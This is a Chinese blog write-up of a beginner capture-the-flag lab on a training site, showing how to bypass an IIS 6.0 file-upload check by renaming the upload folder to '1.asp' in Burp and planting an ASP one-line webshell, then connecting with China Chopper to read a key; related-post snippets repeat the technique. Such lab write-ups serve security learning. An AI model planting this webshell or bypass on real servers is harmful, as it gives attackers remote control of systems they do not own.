墨者学院-入门级-内部文件上传系统漏洞分析溯源-小白必看(超详细)

最新推荐文章于 2023-02-24 22:04:16 发布
最新推荐文章于 2023-02-24 22:04:16 发布
阅读量1.4k 收藏 4
点赞数
分类专栏: 墨者学院-入门级 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kitiu666/article/details/113181303
版权

2021年1月26日,第七次渗透测试。

准备需求:
1、win10系统;
2、中国菜刀;
3、bp拦截工具(不懂的看我以前的博客,有介绍);

1、进入靶场,有一个文件上传口;
在这里插入图片描述
2、我们新建一个文本文件,里面写上一句话muma;
一句话muma:<%eval request (“a”)%>
(这里的’a’是中国菜刀上的webshell密码,可自行更改;)
在这里插入图片描述
3、上传文件,拦截请求包;
以下为拦截包数据截图:
在这里插入图片描述
修改包数据,把“upload”改为“1.asp”;
在这里插入图片描述
然后释放拦截包,返回浏览器页面;
4、可以看到,我们已经得到了返回的地址,可以用菜刀进行远程连接;在这里插入图片描述
5、输入地址和webshell密码,进入后台文件管理;
在这里插入图片描述
6、进入到后台文件管理,看到KEY_2017619826.asp文件,直接打开,有获得key值;
在这里插入图片描述
在这里插入图片描述
一句话muma:
何为一句话muma,即此muma文件简单,简短,通常只有一句话,但是功能强大,入侵性强,通常伴随着中国菜刀来使用。
以下为百度的介绍,有兴趣了解更多的可以自行上网搜查;
在这里插入图片描述

小干货:
在使用中国菜刀时,每次实验完要把软件产生的数据文件删除,否则,当下次再使用其他地址进行连接时,地址栏不会进行转跳,这样我们就无法去到目标地址;
例如:我第一次实验连接地址为:192.168.1.1/html/www,连接后正常转跳到目标地址\html\www\;当我进行第二次实验,实验地址为:10.12.13.1/1.asp/25545622.txt,本来连接后我们转跳的地址应为C:\inetpub\的,但现实是连接后转跳的地址还是第一次实验的地址(即\html\www\),所以这里存在了缓存,我们要把之前的数据删除,再重新连接。
这个我研究了很久,废了很多时间,甚至上网搜查怎样清除中国菜刀的缓存,但没有结果,最后自己琢磨出了,希望大家遇到同样问题时我可以帮助到大家。

缓存文件(删除掉):
在这里插入图片描述

小潜疯
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内部文件上传系统漏洞分析溯源墨者学院
m0_67352890的博客
10-27 393
内部文件上传系统漏洞分析溯源墨者学院
墨者学院(4个sql靶场攻略)
最新发布
2201_75891821的博客
07-22 1659
墨者学院 4种sql注入漏洞的解答 简单易理解 不复杂
墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源
m_de_g的博客
02-24 1070
7.经过测试发现不行,那么查看一下操作系统的版本Microsoft-IIS/6.0。6.有个问题就是服务器将我们所上传的文件进行了重命名,故我们应该想办法截断。8.看看此服务器有没有什么漏洞,发现此版本有文件解析漏洞。,那么此目录下的所有文件就会被当做asp执行。:使用菜刀连接,一开始我还以为马儿有问题。9.把文档中的内容替换成一句话木马。12.接下来,使用菜刀连接。5.上传报错,将其改名为。1.选择合适的文件上传。3.可以推测出此站点为。11.改上传的路径为。
墨者题解_内部文件上传系统漏洞分析溯源
weixin_43072923的博客
04-08 402
墨者学院——内部文件上传系统漏洞分析溯源 根据背景: 我们可以尝试该页面做了什么防护: 首先尝试输入php或者asp文件,发现不行: 再次尝试txt、jpg等文件,发现可以上传: 通过F12查看其服务,为IIS/6.0: 上百度搜索IIS的漏洞,知道了当我们上传xxx.asp文件时,该文件以后的子文件都以asp文件来执行,例如ccooll.asp后面有子文件ccooll.jpg,则/ccooll.asp/ccooll.jpg以asp文件执行。 接下来,我们便开始getshel.
墨者学院-内部文件上传系统漏洞分析溯源
JimWu的博客
09-05 488
内部文件上传系统漏洞分析溯源 难易程度:★ 题目类型:文件上传 使用工具:360安全浏览器、burpsuite、菜刀 1.打开靶场,首先尝试上传php文件。 发现上传失败。 2.再尝试上传一张图片。 发现是可以的,也发现了url中是以asp方式保存,并且文件上传后给改名了。 3.首先查看F12是否存在前端验证,发现是没有的。 4.然后再简单构造一句话木马以txt保存,再次上传,使用burpsu...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者 - 内部文件上传系统漏洞分析溯源
吃肉唐僧的博客
06-30 714
直接上传php文件,失败 F12控制器看下,发现是url是asp 修改为asp文件,同样不行 而且改为jpg文件上传成功后,发现是IIS/6.0 上网查找IIS/6.0得漏洞 在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.as...
内部文件上传系统漏洞分析溯源(墨者学院)
qq_44060093的博客
03-28 357
很简单的一个文件上传漏洞,我去学到了不一样的知识 实训目标 1、熟悉常见中间件存在的解析漏洞; 2、熟悉一句话木马的使用与制作 3、熟悉常见的上传漏洞利用方法 解题方向 1、试探允许上传的文件类型 2、观察服务器在处理完上传任务后返回的内容,获取上传路径 3、尝试修改上传路径,观察服务器是否允许写入权限 题目底下的神评论 1、目录解析、以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。...
墨者学院 - 内部文件上传系统漏洞分析溯源
多崎巡礼的博客
07-26 2126
有意思有意思,搜索了半天还是不懂怎么创建文件夹,老老实实看了解题思路柳暗花明 burp还有这种操作,学到了不亏不亏 上传默认是upload 利用burp截包,更改(没有则自动创建)上传文件夹 此处更改为test.asp (iis6.0漏洞: 例如文件的名字为“*.asp;xxx.jpg”,会被 IIS 当作 asp 文件来解析并执行,原因是这样的: 首先我们请求 /aaa.asp;xxx.jpg...
内部文件上传系统漏洞分析溯源
weixin_47493074的博客
09-16 445
首先根据服务器版本IIS6.0可以判断,利用IIS低版本的解析漏洞。2、IIS解析漏洞分为两种:(IIS6.0在解析asp格式的时候有两个解析漏洞,一个是如果目录名包含“.asp“字符串,那么这个目录下所有的文件都会按照asp去解析,另一个是只要文件名中含有".asp;实战:上传一个asp类型的一句话木马,一定要是asp类型的,然后burp抓包,在GuFolderPath下的upload为upload/*.asp,然后菜刀过去,脚本类型改asp,进入打开inetpub下wwwroot找到key。
文件上传漏洞 —— 内部文件上传系统漏洞分析溯源
vergilben的学习日记
04-11 1871
文件上传漏洞 —— 内部文件上传系统漏洞分析溯源 这篇主要复现墨者学院的一个内部文件上传漏洞,内部文件上传系统漏洞分析溯源,还有另一题会写到另一篇里面。 关于文件上传漏洞,前面我的博客里面有写原理以及简单的实现,再写一下其原理。 文件上传漏洞原理:大部分的网站和应用系统都有上传功能,如用户头像上传、图片上传、文档上传等。一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻...
墨者学院06 内部文件上传系统漏洞分析溯源
weixin_42789937的博客
01-28 436
墨者学院06 内部文件上传系统漏洞分析溯源~友情提示:这道题目我用蚁剑连接失败了,原因不知...所以有可能不是靠谱的WP...
墨者靶场 入门:内部文件上传系统漏洞分析溯源
qq_43233085的博客
01-15 677
墨者靶场 入门:内部文件上传系统漏洞分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 在为某公司检测后台页面时,你发现了一个上传页面,该页面做了一些防护,你需要尝试绕过并上传webshell,以获得网站根目录访问权限 实训目标 1、熟悉常见中间件存在的解析漏洞; 2、熟悉一句话木马的使用与制作 3、熟悉常见的上传漏洞利用方法 解题方向 1、试探允许上传的文件类型 2、观察服务器在处理...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值